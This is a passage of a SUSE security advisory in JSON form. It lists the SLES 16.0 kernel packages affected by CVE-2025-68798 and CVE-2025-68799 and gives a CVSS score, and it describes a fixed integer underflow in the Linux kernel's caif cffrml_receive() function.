"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68798"
},
{
"cve": "CVE-2025-68799",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68799"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncaif: fix integer underflow in cffrml_receive()\n\nThe cffrml_receive() function extracts a length field from the packet\nheader and, when FCS is disabled, subtracts 2 from this length without\nvalidating that len \u003e= 2.\n\nIf an attacker sends a malicious packet with a length field of 0 or 1\nto an interface with FCS disabled, the subtraction causes an integer\nunderflow.\n\nThis can lead to memory exhaustion and kernel instability, potential\ninformation disclosure if padding contains uninitialized kernel memory.\n\nFix this by validating that len \u003e= 2 before performing the subtraction.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
